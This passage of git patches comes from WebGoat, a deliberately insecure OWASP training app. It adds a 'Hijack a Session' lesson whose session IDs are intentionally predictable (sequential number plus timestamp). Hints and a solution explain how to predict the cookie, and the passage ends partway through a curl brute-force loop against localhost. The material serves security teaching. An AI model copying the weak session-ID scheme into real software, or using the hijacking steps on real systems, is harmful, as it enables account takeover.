-import org.springframework.web.bind.annotation.ResponseBody;
-import org.springframework.web.bind.annotation.RestController;
+import org.springframework.http.HttpStatus;
+import org.springframework.web.bind.annotation.*;
+
+import java.util.Map;
 
 @RestController
 public class InsecureLoginTask extends AssignmentEndpoint {
@@ -35,9 +35,15 @@ public class InsecureLoginTask extends AssignmentEndpoint {
     @PostMapping("/InsecureLogin/task")
     @ResponseBody
     public AttackResult completed(@RequestParam String username, @RequestParam String password) {
-    	if (username.toString().equals("CaptainJack") && password.toString().equals("BlackPearl")) {
+    	if ("CaptainJack".equals(username) && "BlackPearl".equals(password)) {
     		return success(this).build();
     	}
         return failed(this).build();
     }
+
+    @PostMapping("/InsecureLogin/login")
+    @ResponseStatus(HttpStatus.ACCEPTED)
+    public void login() {
+        //only need to exists as the JS needs to call an existing endpoint
+    }
 }
diff --git a/webgoat-lessons/insecure-login/src/main/resources/js/credentials.js b/webgoat-lessons/insecure-login/src/main/resources/js/credentials.js
index b7387c623..5f4e09e09 100755
--- a/webgoat-lessons/insecure-login/src/main/resources/js/credentials.js
+++ b/webgoat-lessons/insecure-login/src/main/resources/js/credentials.js
@@ -1,6 +1,6 @@
 function submit_secret_credentials() {
     var xhttp = new XMLHttpRequest();
-    xhttp['open']('POST', '#attack/307/100', true);
+    xhttp['open']('POST', 'InsecureLogin/login', true);
 	//sending the request is obfuscated, to descourage js reading
 	var _0xb7f9=["\x43\x61\x70\x74\x61\x69\x6E\x4A\x61\x63\x6B","\x42\x6C\x61\x63\x6B\x50\x65\x61\x72\x6C","\x73\x74\x72\x69\x6E\x67\x69\x66\x79","\x73\x65\x6E\x64"];xhttp[_0xb7f9[3]](JSON[_0xb7f9[2]]({username:_0xb7f9[0],password:_0xb7f9[1]}))
 }
\ No newline at end of file
diff --git a/webgoat-lessons/insecure-login/src/main/resources/lessonPlans/en/InsecureLogin_Intro.adoc b/webgoat-lessons/insecure-login/src/main/resources/lessonPlans/en/InsecureLogin_Intro.adoc
index bcc3d3ead..a321040c0 100755
--- a/webgoat-lessons/insecure-login/src/main/resources/lessonPlans/en/InsecureLogin_Intro.adoc
+++ b/webgoat-lessons/insecure-login/src/main/resources/lessonPlans/en/InsecureLogin_Intro.adoc
@@ -1,7 +1,7 @@
 
-== Concept
-Encryption is a very important tool for secure communication. In this lesson, we will find out, why it should always be employed when sending sensitive data.
+=== Concept
+Encryption is an essential tool for secure communication. In this lesson, we will find out why it should always be employed when sending sensitive data.
 
-== Goals
+=== Goals
 * The user should have a basic understanding of packet sniffer usage
 * The user will be able to intercept and read unencrypted requests
diff --git a/webgoat-lessons/insecure-login/src/main/resources/lessonPlans/en/InsecureLogin_Task.adoc b/webgoat-lessons/insecure-login/src/main/resources/lessonPlans/en/InsecureLogin_Task.adoc
index e6e7fea56..5d3c92a85 100755
--- a/webgoat-lessons/insecure-login/src/main/resources/lessonPlans/en/InsecureLogin_Task.adoc
+++ b/webgoat-lessons/insecure-login/src/main/resources/lessonPlans/en/InsecureLogin_Task.adoc
@@ -1,4 +1,4 @@
 === Let's try
-Click the "log in" button to send a request containing login credentials of another user.
-Then, write these credentials into the appropriate fields and submit to confirm.
+Click the "log in" button to send a request containing the login credentials of another user.
+Then, write these credentials into the appropriate fields and submit them to confirm.
 Try using a packet sniffer to intercept the request.

From f7dd69e3825c865d21f49f8f9dfb13fc65890409 Mon Sep 17 00:00:00 2001
From: Jeroen Willemsen <jwillemsen@xebia.com>
Date: Tue, 16 Nov 2021 16:38:52 +0100
Subject: [PATCH 099/227] Fix to move to java17

---
 README.MD | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/README.MD b/README.MD
index eb4765853..7003814b9 100644
--- a/README.MD
+++ b/README.MD
@@ -1,7 +1,7 @@
 # WebGoat 8: A deliberately insecure Web Application
 
 [![Pull request build](https://github.com/WebGoat/WebGoat/actions/workflows/pr_build.yml/badge.svg?branch=develop)](https://github.com/WebGoat/WebGoat/actions/workflows/pr_build.yml)
-[![java-jdk](https://img.shields.io/badge/java%20jdk-16-green.svg)](https://jdk.java.net/)
+[![java-jdk](https://img.shields.io/badge/java%20jdk-17-green.svg)](https://jdk.java.net/)
 [![OWASP Labs](https://img.shields.io/badge/owasp-lab%20project-f7b73c.svg)](https://www.owasp.org/index.php/OWASP_Project_Inventory#tab=Labs_Projects)
 [![GitHub release](https://img.shields.io/github/release/WebGoat/WebGoat.svg)](https://github.com/WebGoat/WebGoat/releases/latest)
 [![Gitter](https://badges.gitter.im/OWASPWebGoat/community.svg)](https://gitter.im/OWASPWebGoat/community?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge)

From 6be9635f519655006bb25a67057952985957f9a0 Mon Sep 17 00:00:00 2001
From: Jeroen Willemsen <jwillemsen@xebia.com>
Date: Tue, 16 Nov 2021 16:41:05 +0100
Subject: [PATCH 100/227] Update OWASP badge

---
 README.MD | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/README.MD b/README.MD
index 7003814b9..e18582120 100644
--- a/README.MD
+++ b/README.MD
@@ -2,7 +2,7 @@
 
 [![Pull request build](https://github.com/WebGoat/WebGoat/actions/workflows/pr_build.yml/badge.svg?branch=develop)](https://github.com/WebGoat/WebGoat/actions/workflows/pr_build.yml)
 [![java-jdk](https://img.shields.io/badge/java%20jdk-17-green.svg)](https://jdk.java.net/)
-[![OWASP Labs](https://img.shields.io/badge/owasp-lab%20project-f7b73c.svg)](https://www.owasp.org/index.php/OWASP_Project_Inventory#tab=Labs_Projects)
+[![OWASP Labs](https://img.shields.io/badge/OWASP-Lab%20project-f7b73c.svg)](https://owasp.org/projects/)
 [![GitHub release](https://img.shields.io/github/release/WebGoat/WebGoat.svg)](https://github.com/WebGoat/WebGoat/releases/latest)
 [![Gitter](https://badges.gitter.im/OWASPWebGoat/community.svg)](https://gitter.im/OWASPWebGoat/community?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge)
 

From ec954046db7af5d5ce9ff9a03ad31843cfb1591a Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Tue, 16 Nov 2021 17:36:07 +0100
Subject: [PATCH 101/227] Add Discussions badge

---
 README.MD | 1 +
 1 file changed, 1 insertion(+)

diff --git a/README.MD b/README.MD
index e18582120..54fb67444 100644
--- a/README.MD
+++ b/README.MD
@@ -5,6 +5,7 @@
 [![OWASP Labs](https://img.shields.io/badge/OWASP-Lab%20project-f7b73c.svg)](https://owasp.org/projects/)
 [![GitHub release](https://img.shields.io/github/release/WebGoat/WebGoat.svg)](https://github.com/WebGoat/WebGoat/releases/latest)
 [![Gitter](https://badges.gitter.im/OWASPWebGoat/community.svg)](https://gitter.im/OWASPWebGoat/community?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge)
+[![Discussions](https://img.shields.io/github/discussions/WebGoat/WebGoat)](https://github.com/WebGoat/WebGoat/discussions)
 
 # Introduction
 

From dd2e9f074d9feba3425403651f763c9c42644621 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C3=80ngel=20Oll=C3=A9=20Bl=C3=A1zquez?= <angel@olleb.com>
Date: Sat, 9 Oct 2021 18:50:21 +0200
Subject: [PATCH 102/227] Hijack Session Lesson

---
 .../owasp/webgoat/SessionManagementTest.java  |  47 +++++++
 webgoat-lessons/hijack-session/pom.xml        |  58 +++++++++
 .../webgoat/hijacksession/HijackSession.java  |  48 ++++++++
 .../HijackSessionAssignment.java              |  92 ++++++++++++++
 .../hijacksession/cas/Authentication.java     |  67 ++++++++++
 .../cas/AuthenticationProvider.java           |  39 ++++++
 .../HijackSessionAuthenticationProvider.java  | 100 +++++++++++++++
 .../main/resources/html/HijackSession.html    |  30 +++++
 .../resources/i18n/WebGoatLabels.properties   |   7 ++
 .../en/HijackSession_content0.adoc            |   4 +
 .../lessonPlans/en/HijackSession_plan.adoc    |  10 ++
 .../en/HijackSession_solution.adoc            |  93 ++++++++++++++
 .../lessonSolutions/html/HijackSession.html   |  14 +++
 .../main/resources/templates/hijackform.html  |  24 ++++
 .../HijackSessionAssignmentTest.java          | 108 ++++++++++++++++
 ...jackSessionAuthenticationProviderTest.java | 116 ++++++++++++++++++
 webgoat-lessons/pom.xml                       |   2 +-
 webgoat-server/pom.xml                        |   5 +
 18 files changed, 863 insertions(+), 1 deletion(-)
 create mode 100644 webgoat-integration-tests/src/test/java/org/owasp/webgoat/SessionManagementTest.java
 create mode 100644 webgoat-lessons/hijack-session/pom.xml
 create mode 100644 webgoat-lessons/hijack-session/src/main/java/org/owasp/webgoat/hijacksession/HijackSession.java
 create mode 100644 webgoat-lessons/hijack-session/src/main/java/org/owasp/webgoat/hijacksession/HijackSessionAssignment.java
 create mode 100644 webgoat-lessons/hijack-session/src/main/java/org/owasp/webgoat/hijacksession/cas/Authentication.java
 create mode 100644 webgoat-lessons/hijack-session/src/main/java/org/owasp/webgoat/hijacksession/cas/AuthenticationProvider.java
 create mode 100644 webgoat-lessons/hijack-session/src/main/java/org/owasp/webgoat/hijacksession/cas/HijackSessionAuthenticationProvider.java
 create mode 100644 webgoat-lessons/hijack-session/src/main/resources/html/HijackSession.html
 create mode 100644 webgoat-lessons/hijack-session/src/main/resources/i18n/WebGoatLabels.properties
 create mode 100644 webgoat-lessons/hijack-session/src/main/resources/lessonPlans/en/HijackSession_content0.adoc
 create mode 100644 webgoat-lessons/hijack-session/src/main/resources/lessonPlans/en/HijackSession_plan.adoc
 create mode 100644 webgoat-lessons/hijack-session/src/main/resources/lessonSolutions/en/HijackSession_solution.adoc
 create mode 100644 webgoat-lessons/hijack-session/src/main/resources/lessonSolutions/html/HijackSession.html
 create mode 100644 webgoat-lessons/hijack-session/src/main/resources/templates/hijackform.html
 create mode 100644 webgoat-lessons/hijack-session/src/test/java/org/owasp/webgoat/hijacksession/HijackSessionAssignmentTest.java
 create mode 100644 webgoat-lessons/hijack-session/src/test/java/org/owasp/webgoat/hijacksession/cas/HijackSessionAuthenticationProviderTest.java

diff --git a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/SessionManagementTest.java b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/SessionManagementTest.java
new file mode 100644
index 000000000..458febbb8
--- /dev/null
+++ b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/SessionManagementTest.java
@@ -0,0 +1,47 @@
+/*
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details, please see http://www.owasp.org/
+ *
+ * Copyright (c) 2002 - 2021 Bruce Mayhew
+ *
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
+ *
+ * Getting Source
+ * ==============
+ *
+ * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
+ */
+
+package org.owasp.webgoat;
+
+import java.util.Map;
+
+import org.junit.jupiter.api.Test;
+
+/**
+ *
+ * @author Angel Olle Blazquez
+ *
+ */
+
+class SessionManagementTest extends IntegrationTest {
+    
+    private static final String HIJACK_LOGIN_CONTEXT_PATH = "/HijackSession/login";
+
+
+    @Test
+    void hijackSessionTest() {
+        startLesson("HijackSession");
+        
+        checkAssignment(HIJACK_LOGIN_CONTEXT_PATH, Map.of("username", "webgoat", "password", "webgoat"), false);
+    }
+}
diff --git a/webgoat-lessons/hijack-session/pom.xml b/webgoat-lessons/hijack-session/pom.xml
new file mode 100644
index 000000000..484f96692
--- /dev/null
+++ b/webgoat-lessons/hijack-session/pom.xml
@@ -0,0 +1,58 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0"
+	xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+	xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
+	<modelVersion>4.0.0</modelVersion>
+	<artifactId>hijack-session</artifactId>
+	<packaging>jar</packaging>
+	<parent>
+		<groupId>org.owasp.webgoat.lesson</groupId>
+		<artifactId>webgoat-lessons-parent</artifactId>
+		<version>8.2.3-SNAPSHOT</version>
+	</parent>
+
+	<properties>
+		<jacoco.version>0.8.7</jacoco.version>
+	</properties>
+
+	<profiles>
+		<profile>
+			<!-- mvn clean verify -Pcoverage -->
+			<id>coverage</id>
+			<activation>
+				<activeByDefault>false</activeByDefault>
+			</activation>
+			<build>
+				<plugins>
+					<plugin>
+						<groupId>org.jacoco</groupId>
+						<artifactId>jacoco-maven-plugin</artifactId>
+						<version>${jacoco.version}</version>
+						<executions>
+							<execution>
+								<id>default-prepare-agent</id>
+								<goals>
+									<goal>prepare-agent</goal>
+								</goals>
+							</execution>
+							<execution>
+								<id>default-report</id>
+								<phase>verify</phase>
+								<goals>
+									<goal>report</goal>
+								</goals>
+								<configuration>
+									<dataFile>${project.build.directory}/jacoco.exec</dataFile>
+									<outputDirectory>${project.reporting.outputDirectory}/jacoco</outputDirectory>
+									<excludes>
+										<exclude>**/HijackSession.*</exclude>
+									</excludes>
+								</configuration>
+							</execution>
+						</executions>
+					</plugin>
+				</plugins>
+			</build>
+		</profile>
+	</profiles>
+
+</project>
diff --git a/webgoat-lessons/hijack-session/src/main/java/org/owasp/webgoat/hijacksession/HijackSession.java b/webgoat-lessons/hijack-session/src/main/java/org/owasp/webgoat/hijacksession/HijackSession.java
new file mode 100644
index 000000000..a03929754
--- /dev/null
+++ b/webgoat-lessons/hijack-session/src/main/java/org/owasp/webgoat/hijacksession/HijackSession.java
@@ -0,0 +1,48 @@
+/*
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details, please see http://www.owasp.org/
+ *
+ * Copyright (c) 2002 - 2021 Bruce Mayhew
+ *
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
+ *
+ * Getting Source
+ * ==============
+ *
+ * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
+ */
+
+package org.owasp.webgoat.hijacksession;
+
+import org.owasp.webgoat.lessons.Category;
+import org.owasp.webgoat.lessons.Lesson;
+import org.springframework.stereotype.Component;
+
+/***
+ *
+ * @author Angel Olle Blazquez
+ *
+ */
+
+@Component
+public class HijackSession extends Lesson {
+
+    @Override
+    public Category getDefaultCategory() {
+        return Category.SESSION_MANAGEMENT;
+    }
+
+    @Override
+    public String getTitle() {
+        return "hijacksession.title";
+    }
+}
diff --git a/webgoat-lessons/hijack-session/src/main/java/org/owasp/webgoat/hijacksession/HijackSessionAssignment.java b/webgoat-lessons/hijack-session/src/main/java/org/owasp/webgoat/hijacksession/HijackSessionAssignment.java
new file mode 100644
index 000000000..0500f3e7f
--- /dev/null
+++ b/webgoat-lessons/hijack-session/src/main/java/org/owasp/webgoat/hijacksession/HijackSessionAssignment.java
@@ -0,0 +1,92 @@
+/*
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details, please see http://www.owasp.org/
+ *
+ * Copyright (c) 2002 - 2021 Bruce Mayhew
+ *
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
+ *
+ * Getting Source ==============
+ *
+ * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
+ */
+
+package org.owasp.webgoat.hijacksession;
+
+import javax.servlet.http.Cookie;
+import javax.servlet.http.HttpServletResponse;
+
+import org.apache.commons.lang3.StringUtils;
+import org.owasp.webgoat.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.assignments.AssignmentHints;
+import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.hijacksession.cas.Authentication;
+import org.owasp.webgoat.hijacksession.cas.HijackSessionAuthenticationProvider;
+import org.springframework.beans.factory.annotation.Autowired;
+import org.springframework.web.bind.annotation.CookieValue;
+import org.springframework.web.bind.annotation.PostMapping;
+import org.springframework.web.bind.annotation.RequestParam;
+import org.springframework.web.bind.annotation.ResponseBody;
+import org.springframework.web.bind.annotation.RestController;
+
+/***
+ *
+ * @author Angel Olle Blazquez
+ *
+ */
+
+@RestController
+@AssignmentHints({
+    "hijacksession.hints.1",
+    "hijacksession.hints.2",
+    "hijacksession.hints.3",
+    "hijacksession.hints.4",
+    "hijacksession.hints.5"
+})
+public class HijackSessionAssignment extends AssignmentEndpoint {
+
+    private static final String COOKIE_NAME = "hijack_cookie";
+
+    @Autowired
+    HijackSessionAuthenticationProvider provider;
+
+    @PostMapping(path = "/HijackSession/login")
+    @ResponseBody
+    public AttackResult login(
+        @RequestParam String username,
+        @RequestParam String password,
+        @CookieValue(value = COOKIE_NAME, required = false) String cookieValue,
+        HttpServletResponse response) {
+
+        Authentication authentication;
+        if (StringUtils.isEmpty(cookieValue)) {
+            authentication = provider.authenticate(Authentication.builder().name(username).credentials(password).build());
+            setCookie(response, authentication.getId());
+        } else {
+            authentication = provider.authenticate(Authentication.builder().id(cookieValue).build());
+        }
+
+        if (authentication.isAuthenticated()) {
+            return success(this).build();
+        }
+
+        return failed(this).build();
+    }
+
+    private void setCookie(HttpServletResponse response, String cookieValue) {
+        Cookie cookie = new Cookie(COOKIE_NAME, cookieValue);
+        cookie.setPath("/WebGoat");
+        cookie.setSecure(true);
+        response.addCookie(cookie);
+    }
+
+}
diff --git a/webgoat-lessons/hijack-session/src/main/java/org/owasp/webgoat/hijacksession/cas/Authentication.java b/webgoat-lessons/hijack-session/src/main/java/org/owasp/webgoat/hijacksession/cas/Authentication.java
new file mode 100644
index 000000000..2ee9e069a
--- /dev/null
+++ b/webgoat-lessons/hijack-session/src/main/java/org/owasp/webgoat/hijacksession/cas/Authentication.java
@@ -0,0 +1,67 @@
+/*
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details, please see http://www.owasp.org/
+ *
+ * Copyright (c) 2002 - 2021 Bruce Mayhew
+ *
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
+ *
+ * Getting Source
+ * ==============
+ *
+ * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
+ */
+
+package org.owasp.webgoat.hijacksession.cas;
+
+import java.security.Principal;
+
+import lombok.Builder;
+import lombok.Getter;
+import lombok.ToString;
+
+/**
+ *
+ * @author Angel Olle Blazquez
+ *
+ */
+
+@Getter
+@ToString
+public class Authentication implements Principal {
+
+    private boolean authenticated = false;
+    private String name;
+    private Object credentials;
+    private String id;
+
+    @Builder
+    public Authentication(String name, Object credentials, String id) {
+        this.name = name;
+        this.credentials = credentials;
+        this.id = id;
+    }
+
+    @Override
+    public String getName() {
+        return name;
+    }
+
+    protected void setAuthenticated(boolean authenticated) {
+        this.authenticated = authenticated;
+    }
+
+    protected void setId(String id) {
+        this.id = id;
+    }
+
+}
diff --git a/webgoat-lessons/hijack-session/src/main/java/org/owasp/webgoat/hijacksession/cas/AuthenticationProvider.java b/webgoat-lessons/hijack-session/src/main/java/org/owasp/webgoat/hijacksession/cas/AuthenticationProvider.java
new file mode 100644
index 000000000..0db7cf40d
--- /dev/null
+++ b/webgoat-lessons/hijack-session/src/main/java/org/owasp/webgoat/hijacksession/cas/AuthenticationProvider.java
@@ -0,0 +1,39 @@
+/*
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details, please see http://www.owasp.org/
+ *
+ * Copyright (c) 2002 - 2021 Bruce Mayhew
+ *
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
+ *
+ * Getting Source
+ * ==============
+ *
+ * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
+ */
+
+package org.owasp.webgoat.hijacksession.cas;
+
+import java.security.Principal;
+
+/**
+ *
+ * @author Angel Olle Blazquez
+ *
+ */
+
+@FunctionalInterface
+public interface AuthenticationProvider<T extends Principal> {
+
+    T authenticate(T t);
+
+}
diff --git a/webgoat-lessons/hijack-session/src/main/java/org/owasp/webgoat/hijacksession/cas/HijackSessionAuthenticationProvider.java b/webgoat-lessons/hijack-session/src/main/java/org/owasp/webgoat/hijacksession/cas/HijackSessionAuthenticationProvider.java
new file mode 100644
index 000000000..63ca046f6
--- /dev/null
+++ b/webgoat-lessons/hijack-session/src/main/java/org/owasp/webgoat/hijacksession/cas/HijackSessionAuthenticationProvider.java
@@ -0,0 +1,100 @@
+/*
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details, please see http://www.owasp.org/
+ *
+ * Copyright (c) 2002 - 2021 Bruce Mayhew
+ *
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
+ *
+ * Getting Source
+ * ==============
+ *
+ * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
+ */
+
+package org.owasp.webgoat.hijacksession.cas;
+
+import java.time.Instant;
+import java.util.LinkedList;
+import java.util.Queue;
+import java.util.Random;
+import java.util.concurrent.ThreadLocalRandom;
+import java.util.function.DoublePredicate;
+import java.util.function.Supplier;
+
+import org.apache.commons.lang3.StringUtils;
+import org.springframework.stereotype.Component;
+import org.springframework.web.context.annotation.ApplicationScope;
+
+/**
+ *
+ * @author Angel Olle Blazquez
+ *
+ */
+
+// weak id value and mechanism
+
+@ApplicationScope
+@Component
+public class HijackSessionAuthenticationProvider implements AuthenticationProvider<Authentication> {
+
+    private Queue<String> sessions = new LinkedList<>();
+    private static long id = new Random().nextLong() & Long.MAX_VALUE;
+    protected static final int MAX_SESSIONS = 50;
+
+    private static final DoublePredicate PROBABILITY_DOUBLE_PREDICATE = pr -> pr < 0.75;
+    private static final Supplier<String> GENERATE_SESSION_ID = () -> ++id + "-" + Instant.now().toEpochMilli();
+    public static final Supplier<Authentication> AUTHENTICATION_SUPPLIER = () -> Authentication
+        .builder()
+        .id(GENERATE_SESSION_ID.get())
+        .build();
+
+    @Override
+    public Authentication authenticate(Authentication authentication) {
+        if (authentication == null) {
+            return AUTHENTICATION_SUPPLIER.get();
+        }
+
+        if (StringUtils.isNotEmpty(authentication.getId()) && sessions.contains(authentication.getId())) {
+            authentication.setAuthenticated(true);
+            return authentication;
+        }
+
+        if (StringUtils.isEmpty(authentication.getId())) {
+            authentication.setId(GENERATE_SESSION_ID.get());
+        }
+
+        authorizedUserAutoLogin();
+
+        return authentication;
+    }
+
+    protected void authorizedUserAutoLogin() {
+        if (!PROBABILITY_DOUBLE_PREDICATE.test(ThreadLocalRandom.current().nextDouble())) {
+            Authentication authentication = AUTHENTICATION_SUPPLIER.get();
+            authentication.setAuthenticated(true);
+            addSession(authentication.getId());
+        }
+    }
+
+    protected boolean addSession(String sessionId) {
+        if (sessions.size() >= MAX_SESSIONS) {
+            sessions.remove();
+        }
+        return sessions.add(sessionId);
+    }
+
+    protected int getSessionsSize() {
+        return sessions.size();
+    }
+
+}
diff --git a/webgoat-lessons/hijack-session/src/main/resources/html/HijackSession.html b/webgoat-lessons/hijack-session/src/main/resources/html/HijackSession.html
new file mode 100644
index 000000000..223de6657
--- /dev/null
+++ b/webgoat-lessons/hijack-session/src/main/resources/html/HijackSession.html
@@ -0,0 +1,30 @@
+<!DOCTYPE html>
+
+<html xmlns:th="http://www.thymeleaf.org">
+
+<link rel="stylesheet" type="text/css"
+	href="http://code.jquery.com/ui/1.9.1/themes/base/jquery-ui.css" />
+
+<!-- 1 -->
+<div class="lesson-page-wrapper">
+	<div class="adoc-content" th:replace="doc:HijackSession_plan.adoc"></div>
+</div>
+
+<!-- 2 -->
+<div class="lesson-page-wrapper">
+	<div class="adoc-content" th:replace="doc:HijackSession_content0.adoc"></div>
+	<div class="attack-container">
+		<div class="assignment-success">
+			<i class="fa fa-2 fa-check hidden" aria-hidden="true"></i>
+		</div>
+
+		<div class="container-fluid">
+			<div th:include="hijackform" id="content"></div>
+		</div>
+
+		<div class="attack-feedback"></div>
+		<div class="attack-output"></div>
+	</div>
+</div>
+
+</html>
diff --git a/webgoat-lessons/hijack-session/src/main/resources/i18n/WebGoatLabels.properties b/webgoat-lessons/hijack-session/src/main/resources/i18n/WebGoatLabels.properties
new file mode 100644
index 000000000..7d8972ae1
--- /dev/null
+++ b/webgoat-lessons/hijack-session/src/main/resources/i18n/WebGoatLabels.properties
@@ -0,0 +1,7 @@
+hijacksession.title=Hijack a session
+
+hijacksession.hints.1=Check the 'hijack_cookie' cookie value and think about its format.
+hijacksession.hints.2=The 'hijack_cookie' is divided in two parts and has the following format '"long number"-"another long number"'.
+hijacksession.hints.3=The 'hijack_cookie' is divided in two parts and has the following format '"sequential number"-"unix epoch time"'.
+hijacksession.hints.4=Try to send multiple requests to force the creation of new cookies and check if there's any pattern.
+hijacksession.hints.5=Sometimes, authorized users logs into the application.
diff --git a/webgoat-lessons/hijack-session/src/main/resources/lessonPlans/en/HijackSession_content0.adoc b/webgoat-lessons/hijack-session/src/main/resources/lessonPlans/en/HijackSession_content0.adoc
new file mode 100644
index 000000000..8b260b0da
--- /dev/null
+++ b/webgoat-lessons/hijack-session/src/main/resources/lessonPlans/en/HijackSession_content0.adoc
@@ -0,0 +1,4 @@
+= Hijack a Session
+
+In this lesson we are trying to predict the 'hijack_cookie' value. THe 'hijack_cookie' is used to differentiate authenticated and anonymous users of WebGoat.
+
diff --git a/webgoat-lessons/hijack-session/src/main/resources/lessonPlans/en/HijackSession_plan.adoc b/webgoat-lessons/hijack-session/src/main/resources/lessonPlans/en/HijackSession_plan.adoc
new file mode 100644
index 000000000..dd5a74336
--- /dev/null
+++ b/webgoat-lessons/hijack-session/src/main/resources/lessonPlans/en/HijackSession_plan.adoc
@@ -0,0 +1,10 @@
+= Hijack a Session
+
+== Concept
+
+Application developers who develop their own session IDs frequently forget to incorporate the complexity and randomness necessary for security. If the user specific session ID is not complex and random, then the application is highly susceptible to session-based brute force attacks. 
+
+
+== Goals
+
+Gain access to an authenticated session belonging to someone else. 
diff --git a/webgoat-lessons/hijack-session/src/main/resources/lessonSolutions/en/HijackSession_solution.adoc b/webgoat-lessons/hijack-session/src/main/resources/lessonSolutions/en/HijackSession_solution.adoc
new file mode 100644
index 000000000..e76cd39d1
--- /dev/null
+++ b/webgoat-lessons/hijack-session/src/main/resources/lessonSolutions/en/HijackSession_solution.adoc
@@ -0,0 +1,93 @@
+= Hijack a Session
+
+== Solution
+
+Some standard Linux tools have been used on this solution.
+
+=== Analysis
+
+Inspect the 'hijack_cookie' cookie value:
+
+[source, text]
+----
+3814082160704930327-1636910266991
+----
+
+The 'hijack_cookie' is divided in two parts and has the following format:
+
+**<sequential number>-<unix epoch time>**
+
+The first part of the cookie value is an identifier that increases by 1 in each cookie, and the part after the dash is a time value that is calculated when the request is submitted.
+
+Notice that there is sometimes a gap in the first value of the 'hijack_cookie', where one number (or more) is skipped. The missing value means that possibly some user logged in into the system and an authorized cookie has been generated and assigned to him.
+
+It's simple to spot where this value is if we know the cookie values between this valid user cookie.
+
+=== Brute forcing
+
+Send some clean request (without setting the hijack_cookie) to the /WebGoat/HijackSession/login endpoint.
+
+[source, sh]
+----
+# command
+for i in $(seq 1 10); do 
+curl 'http://localhost:8080/WebGoat/HijackSession/login'   \
+-H 'Connection: keep-alive'   \
+-H 'sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90"'   \
+-H 'Accept: */*'   \
+-H 'X-Requested-With: XMLHttpRequest'   \
+-H 'sec-ch-ua-mobile: ?0'   \
